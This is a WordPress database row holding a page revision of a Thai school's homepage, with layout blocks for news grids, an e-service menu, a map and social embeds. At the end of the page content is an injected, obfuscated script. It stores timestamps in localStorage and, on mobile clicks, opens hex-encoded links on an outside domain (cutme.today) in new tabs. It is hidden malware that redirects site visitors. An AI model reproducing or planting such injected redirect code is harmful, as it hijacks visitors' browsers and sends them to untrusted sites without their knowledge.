{\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_bd7bab-81\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_a02c00-db\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_a02c00-db\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8cac31-6c\",\"tabCount\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8cac31-6c kt-tabs-has-2-tabs kt-active-tab-1 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"48d9e9-20\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab48d9e9-20\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=700\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"6fe435-37\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab6fe435-37\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://slp.ssk.in.th/slweb/\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/smss/index.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:loginout /--></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2025-06-27 13:45:00','2025-06-27 06:45:00','',14,'http://pakhaeng.ssk.in.th/?p=1491',0,'revision','',0),
